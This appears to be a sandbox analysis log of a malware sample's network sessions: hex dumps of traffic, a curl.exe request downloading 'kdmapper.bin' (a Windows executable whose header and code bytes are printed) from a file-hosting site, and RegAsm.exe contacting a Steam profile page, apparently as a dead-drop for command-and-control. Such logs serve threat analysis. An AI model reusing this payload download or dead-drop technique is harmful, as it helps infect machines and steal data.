2024-09-30 16:20:10 UTC	1369	IN	Data Raw: b9 97 ee d9 92 7d 3e c4 20 3a b4 ef 3f 15 dd f7 b7 8f cf 6d 91 51 45 42 e7 d4 5f d8 c4 0c 7c e9 fb f3 db 4f bb fe 99 be ed ae 68 51 b5 c1 77 4f e5 0e 85 dd 21 aa 19 5e 53 de 6a d4 6d 55 c1 54 09 09 8f 24 26 51 79 d7 75 7f db c2 b9 80 3c a9 a0 a9 a2 70 ec e2 35 36 cd 8d 62 94 1a 29 c5 91 4f 66 f5 51 d8 38 d2 15 c0 e2 7d 85 38 ec 10 4f 7e 17 29 56 5c b7 7f f2 05 74 78 ab 7d d9 d6 08 40 c1 10 bf c9 f0 cd 7f e3 91 29 3d 26 4c 52 4f b5 56 07 91 05 b8 a8 5f 80 bc 75 88 1b 80 26 17 21 df e3 fb 96 1c 59 3a 69 39 0b f3 ea 2a 51 28 ff 5c b0 a9 b3 bb de 18 a9 c7 56 89 d3 9b aa a3 e4 50 b4 ba 0f 90 bc 42 ac be b7 86 c2 b5 be 9c 76 11 87 f6 46 d2 59 28 4c a3 78 5f 77 ab e6 ae e2 b3 9d ee 08 d2 e1 90 44 7b e6 a2 ba 8a 00 91 c5 71 c7 ca 5d 50 7e aa b6 63 87 b0 74 46 63 Data Ascii: }> :?mQEB_\|OhQwO!^SjmUT$&Qyu<p56b)OfQ8}8O~)V\tx}@)=&LROV_u&!Y:i9*Q(\VPBvFY(Lx_wD{q]P~ctFc
2024-09-30 16:20:10 UTC	1369	IN	Data Raw: 5f 0f 28 43 ce 78 12 84 32 75 5d 67 61 3c b1 30 99 eb 62 5f f5 ce 44 19 f7 9e 6d 03 72 57 32 55 f6 bb 09 c5 f5 dc 74 09 cb 53 22 20 0b 38 f6 45 fd 98 35 71 18 c7 ae 85 5a b2 a3 9d ca e1 74 b9 2c 38 46 12 80 7a 12 69 58 c8 70 ba bc 0a 2d 1e 45 36 ce d2 8b 70 53 7e 20 ec 34 31 78 04 fe 8a 18 6e f8 ac b8 89 ff 37 50 e4 bc c6 ae 3b bd e1 8b 5f f2 cf 48 37 03 e3 5e b0 99 0a fc f1 0c c6 71 b8 61 bc 40 30 a8 32 48 80 c9 79 28 a8 e6 23 e6 ce 51 a8 4d b8 43 82 cf ec 82 6b 2f fd 16 b1 42 db 64 5d 91 b4 8d 5d 02 a0 54 a9 04 cd 1b 18 09 86 07 0b d8 79 34 0d ea 9e 67 aa 2f 84 48 3c c7 e3 4e ff fa 02 89 6c a1 f2 e5 35 78 62 2d f2 74 05 c4 6c 2e e0 39 5c c0 e1 b1 e8 92 43 fe ba 0f 24 99 79 3f 57 dd 01 c3 7d 15 e4 a1 c8 40 5d 17 e3 f9 da 2b e2 6a 04 70 2d da f3 d4 39 4a Data Ascii: _(Cx2u]ga<0b_DmrW2UtS" 8E5qZt,8FziXp-E6pS~ 41xn7P;_H7^qa@02Hy(#QMCk/Bd]]Ty4g/H<Nl5xb-tl.9\C$y?W}@]+jp-9J
2024-09-30 16:20:10 UTC	1369	IN	Data Raw: 42 3b c2 38 5b 0d d5 23 a7 ed 53 cd ad 7f 5b 54 8e 86 00 b4 96 ee 53 43 ee 85 90 aa 8d 74 38 57 58 fe 24 b8 00 30 95 3c 4e 10 74 29 7a 22 be df d5 50 1e ba 4b bb f7 a6 73 c4 b4 ac 88 37 ec bb 69 8c da c0 5f f9 07 4e 93 37 ca 97 ec d5 ae 44 d1 88 72 e4 a1 8b 09 f6 ef b8 a5 55 60 50 f3 c4 a4 3b 19 c1 57 7b 18 70 8a 80 c6 ed 1f 1f 87 cb fe 9b e9 9b f3 e7 3a 9d 86 36 65 23 04 74 33 a1 ff 0d fc 64 b3 8c a0 cd 4f 3d 12 c7 a5 61 09 85 d7 5b d3 a2 13 08 46 40 ea 3f 82 ff 89 f7 66 30 aa 12 0c cc 8d 86 54 a6 5f 5c f6 53 76 4d ca 8c da 1d eb 63 b9 0e c7 65 a9 78 f1 31 33 40 6a fa 95 8c c9 ad 98 8b e9 e0 27 9d 9e 6e d9 42 d1 ae a6 7b 2e 5b 25 d8 13 d0 ee a3 d3 fe 89 77 fc bd 93 5a bd 72 a9 4e 2a cf 1e 96 85 1b d0 82 ea 04 dc f2 3e 36 15 ad 97 5a f9 ff 8d 05 a2 0e da Data Ascii: B;8[#S[TSCt8WX$0<Nt)z"PKs7i_N7DrU`P;W{p:6e#t3dO=a[F@?f0T_\SvMcex13@j'nB{.[%wZrN*>6Z
2024-09-30 16:20:10 UTC	1369	IN	Data Raw: da 2c 8f cd 05 db 65 80 ec 7a 7d 93 eb 70 e9 a7 88 2d 10 90 61 90 bb 00 94 84 e5 c7 98 27 c5 0e 75 a6 98 05 03 7a f5 5e 6c d0 54 fc 36 f8 c7 26 ae 1c 53 3a e2 de 31 97 91 67 c6 3c 2f 47 b8 4b 17 9f 70 01 93 92 a1 e6 0f 88 b3 d8 d3 2c 56 d6 fe f3 7a 98 e0 33 39 b4 43 fb a3 e8 11 4c 57 ad 59 86 68 03 88 a4 bd 93 44 5c b9 bb 4b af bb 47 21 96 fe 97 60 1f 98 67 35 89 f1 5c dd b4 65 e3 09 a6 1a a8 d8 5a c5 30 5f 9e 04 6b ec 2f 70 03 1e 33 f8 88 ec 77 97 c3 a4 2e 0e f7 fc 83 18 8b e3 99 37 8b 4a b1 36 d7 23 5a 35 a7 51 cb b8 a9 52 e4 3d c9 05 5e 26 95 e5 c8 39 37 f8 f5 e0 0c 58 cb 23 8c 73 47 b8 f4 fa e6 fb 60 21 11 bd 12 de 17 b3 b8 b6 26 4d d7 80 3c 7e f4 f7 c5 b6 d8 7d a5 6d 14 b7 d8 58 eb 8f 7f f0 29 43 73 5f e3 66 34 b3 7d 6a 56 cb 03 97 dc 95 c2 9d b4 7f Data Ascii: ,ez}p-a'uz^lT6&S:1g</GKp,Vz39CLWYhD\KG!`g5\eZ0_k/p3w.7J6#Z5QR=^&97X#sG`!&M<~}mX)Cs_f4}jV
2024-09-30 16:20:10 UTC	1369	IN	Data Raw: fd 78 fb a4 4a 66 99 b7 53 7b ab 06 7e 5a 05 99 c0 73 8c 4e 9a 7f e0 a9 b8 bb 14 a6 a8 5c 1a a0 70 56 77 95 cb 60 ea f7 bd 64 a8 ad ed 88 06 bb 5b 72 ee d7 a1 63 0c c0 b6 e0 94 e1 89 45 44 62 8f 3d a8 94 a1 e7 09 42 7c 41 33 28 c6 58 3d 1d da 3f e7 7b 49 70 e7 35 60 9f 9b 87 44 53 df 66 84 31 6a ee 36 26 46 b0 56 9e c8 fb 80 f2 ca b0 63 9b 0d 09 0b 4e 91 13 12 49 99 55 15 a3 9d 4d 82 75 63 d2 30 d5 c5 09 a7 84 19 fe bc 83 9e e6 4d 65 a2 3f 84 12 43 c6 a8 38 32 73 41 50 39 92 3f 92 ce 36 d4 69 d5 e5 32 cf 30 46 44 1f 74 23 d4 43 b8 34 1d 3f 70 41 e9 7c e1 92 79 a3 55 73 6d 6a 8d 65 7c 11 5c 0e 3c f1 7f 8d bb bb 5f 0b da fd c8 74 09 64 d8 20 c1 d3 24 7d 84 64 34 cd fe 4e 6c af 36 fe 81 2a 0b f1 19 ac 66 a3 ad 8f e9 b1 09 d3 d4 94 e6 63 89 1f 5f 04 98 01 21 Data Ascii: xJfS{~ZsN\pVw`d[rcEDb=B\|A3(X=?{Ip5`DSf1j6&FVcNIUMuc0Me?C82sAP9?6i20FDt#C4?pA\|yUsmje\|\<_td $}d4Nl6*fc_!
2024-09-30 16:20:10 UTC	1369	IN	Data Raw: 21 cd 72 e1 17 34 2f 56 df 2b d7 80 70 53 e2 5f 70 18 8b 55 25 32 1a 39 0b 05 fb 5c 9a 55 a5 3f 8a 3b da 24 81 58 a3 8a ad 79 c7 8c e4 c2 21 9f 3e 1f 46 66 e1 ff 39 d9 33 82 52 a4 b1 4b a6 e1 ea 7a 06 56 3c 2a bb ec 8c d3 3a 65 c9 90 79 ab cf 79 7d b5 8d d9 56 c2 98 b3 54 5a 5a 3d 2c 24 eb 0c 12 47 7a 2a 5c b7 64 e1 ee 3e 76 7b bc eb 66 23 88 d0 2a ef 2f cb 4b 5e 66 5f 47 f4 ba a6 81 78 3a a6 5d 97 0c 3a ff 2e c9 51 e4 b5 d5 3a 7e 3c f1 26 eb ec 98 a2 b4 83 9c 3f 21 20 2e 13 a1 f2 da 4b 3d f4 2c f3 72 e8 eb 50 33 e4 ef 1e 1a 92 bb 48 1c da a3 36 34 b2 eb 90 4e af 06 bc 31 da ea 38 8d 15 d1 85 5d 52 6e 0b 99 9a a1 3c b6 6d 53 3f ad 6f 64 a3 f4 95 fa 0d 9c ab 44 37 03 53 68 f0 8f c3 56 5e 4a 41 81 ff 4b 93 f4 56 6a cd 5c 7e 19 a7 90 8a 89 65 d3 70 24 5d 52 Data Ascii: !r4/V+pS_pU%29\U?;$Xy!>Ff93RKzV<:eyy}VTZZ=,$Gz\d>v{f#*/K^f_Gx:]:.Q:~<&?! .K=,rP3H64N18]Rn<mS?odD7ShV^JAKVj\~ep$]R
2024-09-30 16:20:10 UTC	1369	IN	Data Raw: bc d8 05 68 d8 da f5 21 9f a7 4c a0 33 85 79 90 91 bd 38 73 36 7d 2a d6 a9 8a 2e 5e 35 6b 60 d7 49 b9 f9 9b 04 ce 38 5b de b3 1c 04 1f 5d e5 f0 2d e8 5c ae ef 28 57 2f 89 1e d5 5b da 3a 3d 16 58 6f 5f 40 af 93 12 92 0b 71 c6 87 b4 b6 88 a7 24 87 22 97 47 9d 38 9d a8 d2 74 8b aa cb c0 ff cc 05 fc 0d 78 25 72 3a 80 32 16 d0 59 2d dd 4e 6f 73 b1 cf 53 6d e5 25 8e 0a 41 5e ff 54 32 e0 3c 2f 7c aa f0 7f c1 4c 7c 5b 9c 08 c1 8c fb 32 7d c4 01 de 63 72 22 44 0a 65 4e bf 18 29 d7 76 bd 76 5f 91 65 48 2a 8b a9 ec 34 e3 6a 6e f5 bf 6d 13 83 9a 24 ef 95 57 53 10 c8 9d ca fb 5f 6b ff b5 07 a8 aa 35 a1 63 95 a4 f3 03 b1 9e 3a 11 54 d2 e6 95 ea 69 d4 4e 53 93 fe e1 e5 52 6a d5 58 f2 90 2a 27 12 cf 54 44 d4 08 b2 ce 94 7c c2 af fd 4b 7b e0 ea d9 ed 33 b5 05 f6 31 0c 3f Data Ascii: h!L3y8s6}.^5k`I8[]-\(W/[:=Xo_@q$"G8tx%r:2Y-NosSm%A^T2</\|L\|[2}cr"DeN)vv_eH4jnm$WS_k5c:TiNSRjX*'TD\|K{31?

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.10	49714	188.114.97.3	443	7592	C:\Windows\System32\curl.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-30 16:20:14 UTC	104	OUT	GET /ZmE_ziOgiFXI9Y48/kdmapper.bin HTTP/1.1 Host: file.garden User-Agent: curl/7.83.1 Accept: /
2024-09-30 16:20:14 UTC	819	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 16:20:14 GMT Content-Type: application/octet-stream Content-Length: 2284739 Connection: close x-powered-by: Express access-control-allow-origin: * content-security-policy: default-src file.garden linkh.at data: mediastream: blob: 'unsafe-inline' 'unsafe-eval' last-modified: Fri, 20 Sep 2024 19:21:00 GMT Cache-Control: max-age=14400 CF-Cache-Status: HIT Age: 853133 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o%2FYhWvGVjf7%2FpurLT2TUZThXoZpmJHQxTCeJvXzacyGxbGFmQTjsLgC1ck8hHZ7x9PkQzCsCfaKPyAAprODc54vKL%2Fb0d7vhlnxnavMnA%2FZm9%2BK0IjBYmvyCRyZSzw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cb58a04ef188c89-EWR
2024-09-30 16:20:14 UTC	550	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 78 5f 63 ed 3c 3e 0d be 3c 3e 0d be 3c 3e 0d be 88 a2 fc be 31 3e 0d be 88 a2 fe be b2 3e 0d be 88 a2 ff be 24 3e 0d be 9d 49 f0 be 3e 3e 0d be 9d 49 09 bf 2f 3e 0d be 9d 49 0e bf 2b 3e 0d be 9d 49 08 bf 08 3e 0d be 35 46 8e be 37 3e 0d be 35 46 9e be 3b 3e 0d be 3c 3e 0c be 29 3f 0d be c9 49 08 bf 0d 3e 0d be c9 49 0d bf 3d 3e 0d be c9 49 f2 be 3d 3e 0d be c9 49 0f bf 3d 3e 0d Data Ascii: MZ@!L!This program cannot be run in DOS mode.$x_c<><><>1>>$>I>>I/>I+>I>5F7>5F;><>)?I>I=>I=>I=>
2024-09-30 16:20:14 UTC	1369	IN	Data Raw: 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c0 ae 00 00 00 30 03 00 00 b0 00 00 00 20 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 20 47 02 00 00 e0 03 00 00 10 00 00 00 d0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 90 01 00 00 00 30 06 00 00 02 00 00 00 e0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 df 00 00 00 40 06 00 00 e0 00 00 00 e2 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 3c 23 00 00 00 20 07 00 00 24 00 00 00 c2 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: `.rdata0 @@.data G@.didat0@.rsrc@@@.reloc<# $@B
2024-09-30 16:20:14 UTC	1369	IN	Data Raw: 00 e8 3c cf 00 00 32 c0 5d c2 1c 00 55 8b ec 83 ec 4c ff 75 08 8d 4d b4 e8 2a 02 00 00 8b 4d f4 83 f9 08 73 0a 8b 45 0c 89 44 8d b4 ff 45 f4 8d 4d b4 e8 48 02 01 00 c9 c2 08 00 56 ff 74 24 08 8b f1 33 c0 89 06 89 46 04 89 46 08 89 46 0c 88 46 10 e8 5c 03 00 00 8b c6 5e c2 04 00 b8 35 26 43 00 e8 92 d7 01 00 51 51 53 56 8b f1 89 75 f0 e8 62 81 00 00 33 db c7 06 f8 35 43 00 8d 8e 38 10 00 00 89 5d fc e8 2d 4a 00 00 8d 8e f8 20 00 00 c6 45 fc 01 e8 27 ba 00 00 8d 8e 98 22 00 00 89 9e e8 21 00 00 89 9e ec 21 00 00 e8 4a 01 00 00 8d 8e e8 45 00 00 e8 3f 01 00 00 8b 4d 08 85 c9 c6 45 fc 04 0f 94 c0 89 9e d4 21 00 00 88 86 d0 21 00 00 85 c9 75 23 68 f0 92 00 00 e8 d7 d6 01 00 59 89 45 ec c6 45 fc 05 85 c0 74 09 8b c8 e8 91 a0 00 00 eb 06 8b c3 eb 02 8b c1 89 86 Data Ascii: <2]ULuM*MsEDEMHVt$3FFFF\^5&CQQSVub35C8]-J E'"!!JE?ME!!u#hYEEt
2024-09-30 16:20:14 UTC	1369	IN	Data Raw: 00 75 0b 8d 46 32 50 6a 39 e8 a5 fa ff ff 6a 02 b9 98 10 44 00 e8 3f 53 00 00 5e c2 04 00 53 56 8b f1 33 db 57 53 8b 3e 38 9e 3c 22 00 00 74 3d 8b 86 d8 6c 00 00 8b 4f 10 83 c0 14 53 50 ff 15 78 32 43 00 8b ce ff 57 10 8b ce e8 05 22 00 00 85 c0 74 15 83 be f4 21 00 00 75 75 0c 8b 44 24 10 39 58 04 0f 97 c0 eb 3c 32 c0 eb 38 e8 85 08 00 00 8b 4f 10 52 50 ff 15 78 32 43 00 8b ce ff 57 10 68 70 36 43 00 8b ce e8 3d 26 00 00 85 c0 74 11 ff 74 24 10 8b ce e8 db 04 00 00 84 c0 74 02 b3 01 8a c3 5f 5e 5b c2 04 00 80 b9 d4 6c 00 00 00 8b 54 24 04 74 1a 8b c2 f7 d8 83 e0 0f 03 d0 83 b9 c8 6c 00 00 03 75 05 83 c2 10 eb 03 83 c2 08 8b c2 c2 04 00 55 8b e9 80 bd ce 6c 00 00 00 75 04 32 c0 eb 41 8b 45 00 53 56 57 8b 70 14 8b ce ff 15 78 32 43 00 8b cd ff d6 ff 74 24 Data Ascii: uF2Pj9jD?S^SV3WS>8<"t=lOSPx2CW"t!uuD$9X<28ORPx2CWhp6C=&tt$t_^[lT$tluUlu2AESVWpx2Ct$
2024-09-30 16:20:14 UTC	1369	IN	Data Raw: 06 84 c0 75 04 6a 02 eb 10 3c 01 75 04 6a 03 eb 08 2c 02 3c 02 77 03 6a 04 59 8b c1 c2 08 00 b8 73 26 43 00 e8 1e cd 01 00 83 ec 18 53 33 db 8b c1 89 45 f0 89 5d dc 89 5d e0 89 5d e4 89 5d e8 88 5d ec 53 53 8d 4d dc 89 5d fc 51 8b c8 e8 36 1d 00 00 84 c0 0f 84 83 00 00 00 56 57 8b 7d e0 8d 4d dc 6a 01 e8 97 f8 ff ff 8b 4d e0 8b 45 dc 8b 75 08 88 5c 01 ff 8d 47 01 50 8b ce e8 f6 f9 ff ff 8b 45 f0 83 b8 c8 6c 00 00 03 75 0f ff 76 04 ff 36 ff 75 dc e8 6f fd 00 00 eb 2d f6 80 0c 46 00 00 01 74 17 d1 ef 57 ff 36 ff 75 dc e8 19 fd 00 00 8b 06 33 c9 66 89 0c 78 eb 0d ff 76 04 ff 36 ff 75 dc e8 89 fc 00 00 ff 36 e8 11 1f 02 00 59 50 8b ce e8 9e f9 ff ff 5f b3 01 5e 8b 45 dc c7 45 fc 02 00 00 00 85 c0 74 19 80 7d ec 00 74 0c ff 75 e4 50 e8 19 d5 00 00 8b 45 dc 50 Data Ascii: uj<uj,<wjYs&CS3E]]]]]SSM]Q6VW}MjMEu\GPEluv6uo-FtW6u3fxv6u6YP_^EEt}tuPEP
2024-09-30 16:20:14 UTC	1369	IN	Data Raw: 03 8b e9 75 0d 8b 47 18 2b c2 83 f8 01 75 03 8d 69 01 8d b3 28 10 00 00 55 8b ce e8 13 fd ff ff 55 ff 36 8b cf e8 a9 a8 00 00 e9 90 04 00 00 8b cf e8 3b a9 00 00 8b c8 89 44 24 20 c1 e9 02 8d ab 08 21 00 00 80 e1 01 88 8b 06 21 00 00 8b c8 c1 e9 03 80 e1 01 88 8b 07 21 00 00 c6 83 08 22 00 00 00 c6 45 00 00 a8 01 74 29 8b cf e8 ff a8 00 00 8b f0 b8 ff 00 00 00 3b f0 72 02 8b f0 56 55 8b cf e8 4b a8 00 00 8b 44 24 20 c6 84 1e 08 21 00 00 00 a8 02 74 2b 8b cf e8 d2 a8 00 00 8b f0 b8 ff 00 00 00 3b f0 72 02 8b f0 56 8d 83 08 22 00 00 8b cf 50 e8 18 a8 00 00 c6 84 1e 08 22 00 00 00 80 bb 06 21 00 00 00 74 0d 8b cf e8 9e a8 00 00 89 83 08 23 00 00 80 bb 07 21 00 00 00 74 0d 8b cf e8 88 a8 00 00 89 83 0c 23 00 00 c6 83 05 21 00 00 01 e9 c4 03 00 00 8b cf e8 6f Data Ascii: uG+ui(UU6;D$ !!!"Et);rVUKD$ !t+;rV"P"!t#!t#!o
2024-09-30 16:20:14 UTC	1369	IN	Data Raw: 8b cb ff d6 83 f8 08 74 0c 8b cb e8 09 17 00 00 e9 e2 09 00 00 33 c9 8d 45 40 51 51 51 51 50 8b 83 d4 21 00 00 8d b3 38 10 00 00 05 24 60 00 00 50 6a 04 51 8b ce e8 1c 37 00 00 89 75 3c eb 03 88 4d 5a 57 8d 4d 1c e8 5b a4 00 00 83 7d 34 00 74 b7 8d 4d 1c e8 89 a2 00 00 0f b7 c0 8d 4d 1c 89 83 fc 21 00 00 c6 83 0c 22 00 00 00 e8 5a a2 00 00 8d 4d 1c 0f b6 f0 e8 66 a2 00 00 0f b7 c0 8d 4d 1c 89 83 04 22 00 00 c1 e8 0e 24 01 88 83 0c 22 00 00 e8 4a a2 00 00 0f b7 c8 89 8b 08 22 00 00 89 b3 00 22 00 00 3b cf 73 0c 8b cb e8 41 f7 ff ff e9 3f 09 00 00 8b c6 6a 02 5a 83 e8 73 74 2a 83 e8 01 74 1b 83 e8 06 74 09 83 e8 01 75 28 6a 05 eb 02 6a 03 58 89 83 00 22 00 00 8b f0 eb 17 89 93 00 22 00 00 8b f2 eb 0d 33 f6 c7 83 00 22 00 00 01 00 00 00 46 89 b3 f4 21 00 00 Data Ascii: t3E@QQQQP!8$`PjQ7u<MZWM[}4tMM!"ZMfM"$"J"";sA?jZst*ttu(jjX""3"F!
2024-09-30 16:20:14 UTC	1369	IN	Data Raw: ff ff 50 e8 4c 10 02 00 40 59 3b f8 76 22 68 00 08 00 00 ff 75 54 8b cf 2b c8 51 8d 8d d0 df ff ff 03 c1 50 8b c1 8d 4d 00 57 50 e8 1a 3b 00 00 8b 4d 54 33 c0 66 39 01 75 14 6a 01 68 00 08 00 00 51 8d 85 d0 df ff ff 50 e8 30 d4 00 00 56 8b cb e8 a2 f2 ff ff e9 3f 01 00 00 68 00 08 00 00 51 8d 85 d0 df ff ff 50 e8 db ec 00 00 8b 46 0c 2b 45 50 f7 46 08 00 04 00 00 8d 78 e0 74 03 8d 78 d8 85 ff 0f 8e f6 00 00 00 8d 8e 28 10 00 00 57 e8 eb f1 ff ff 57 8d be 28 10 00 00 ff 37 8d 4d 1c e8 7a 9d 00 00 68 78 36 43 00 ff 75 54 e8 59 0f 02 00 59 59 85 c0 0f 85 c2 00 00 00 83 be 2c 10 00 00 14 0f 82 b5 00 00 00 8b 0f 0f b6 41 0b 99 8b f0 8b fa 0f b6 41 0a 0f a4 f7 08 99 c1 e6 08 03 f0 0f b6 41 09 13 fa 99 0f a4 f7 08 c1 e6 08 03 f0 0f b6 41 08 13 fa 99 0f a4 f7 08 Data Ascii: PL@Y;v"huT+QPMWP;MT3f9ujhQP0V?hQPF+EPFxtx(WW(7Mzhx6CuTYYY,AAAA
2024-09-30 16:20:14 UTC	1369	IN	Data Raw: cb ff d6 83 f8 10 0f 85 17 01 00 00 8b 83 d4 21 00 00 80 b8 24 61 00 00 00 75 0d e8 ae e7 00 00 c6 45 6b 00 84 c0 74 04 c6 45 6b 01 8b cb e8 a5 0a 00 00 8d 45 28 33 c9 50 51 ff b3 78 22 00 00 8d 45 18 50 8b 83 d4 21 00 00 8d bb 7c 22 00 00 57 05 24 60 00 00 8d b3 38 10 00 00 50 6a 05 51 8b ce e8 3e 2c 00 00 80 bb 74 22 00 00 00 74 7d 8d 83 8c 22 00 00 6a 08 50 8d 45 28 50 e8 33 d8 01 00 83 c4 0c 85 c0 74 64 80 7d 6b 00 8d 43 32 50 50 75 5e 68 83 00 00 00 e8 ee eb ff ff 8b 8b d4 21 00 00 81 c1 24 60 00 00 e8 35 be 00 00 8b cb e8 22 0a 00 00 8d 45 28 33 c9 50 51 ff b3 78 22 00 00 8d 45 18 50 8b 83 d4 21 00 00 57 05 24 60 00 00 50 6a 05 51 8b ce e8 c7 2b 00 00 80 bb 74 22 00 00 00 8d 83 8c 22 00 00 75 89 89 75 50 eb 22 6a 06 e8 93 eb ff ff 6a 0b b9 98 10 44 Data Ascii: !$auEktEkE(3PQx"EP!\|"W$`8PjQ>,t"t}"jPE(P3td}kC2PPu^h!$`5"E(3PQx"EP!W$`PjQ+t""uuP"jjD
2024-09-30 16:20:14 UTC	1369	IN	Data Raw: 94 00 00 8d 4d 30 88 46 18 e8 ff 93 00 00 8b 8b 04 22 00 00 33 d2 c1 e9 06 42 8b f8 c7 86 fc 10 00 00 02 00 00 00 8a 46 18 22 ca 88 8e f8 10 00 00 3a c2 75 08 89 96 fc 10 00 00 eb 0b 84 c0 75 07 83 a6 fc 10 00 00 00 8b 4e 08 8b c1 c1 e8 03 22 c2 88 86 98 10 00 00 8b c1 c1 e9 05 c1 e8 04 22 ca 22 c2 88 8e fa 10 00 00 83 7d 64 02 8b 4d 60 88 86 99 10 00 00 75 09 f6 c1 40 74 04 8a c2 eb 02 32 c0 88 86 f0 10 00 00 8a 86 94 10 00 00 22 c2 c1 e9 0a 88 86 f1 10 00 00 83 e1 0f 0f b6 c0 ba 00 00 02 00 d3 e2 f7 d8 1b c0 f7 d0 23 c2 89 86 f4 10 00 00 0f b6 86 9b 10 00 00 f7 d8 1b c0 83 e0 05 89 86 9c 10 00 00 b8 ff 1f 00 00 3b f8 72 02 8b f8 57 8d 85 8c df ff ff 50 8d 4d 30 e8 8a 92 00 00 c6 84 3d 8c df ff ff 00 8d 85 8c df ff ff 68 00 08 00 00 8d 7e 28 57 50 e8 4b Data Ascii: M0F"3BF":uuN"""}dM`u@t2"#;rWPM0=h~(WPK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.10	49715	104.102.49.254	443	8060	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-30 16:20:18 UTC	219	OUT	GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
2024-09-30 16:20:19 UTC	1870	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Mon, 30 Sep 2024 16:20:19 GMT Content-Length: 34678 Connection: close Set-Cookie: sessionid=dffd39bf6a72115ef3027e57; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
2024-09-30 16:20:19 UTC	14514	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
